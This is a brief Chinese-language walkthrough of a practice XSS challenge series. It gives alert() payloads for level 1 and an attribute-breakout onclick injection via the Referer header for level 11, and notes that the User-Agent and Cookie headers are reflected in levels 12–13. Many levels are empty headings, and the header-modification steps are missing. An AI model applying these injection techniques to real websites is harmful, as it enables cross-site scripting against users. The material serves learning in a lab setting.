XSS挑战

地址 : XSS之旅XSS之旅

level1

?name=<script>alert(/xss/)</script>

控制台: javascript:alert(/xss/) 通关所有

level2

level3

level4

level5

level6

level7

level8

level9

level10

level11

<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_ref" value="http://test.ctf8.com/level10.php?t_sort=click%20me!%22%20type=%22button%22%20onclick=%22alert(/xss/)" type="hidden">

t_ref 的值为 Referer 参数

拦截请求包修改:

level12

<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.5.810 Yowser/2.5 Safari/537.36" type="hidden">

t_ua 的值为 User-Agent 参数

拦截请求包修改:

level13

<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_cook" value="" type="hidden">

猜测 t_cook 值为 Cookie 的参数

拦截请求包修改: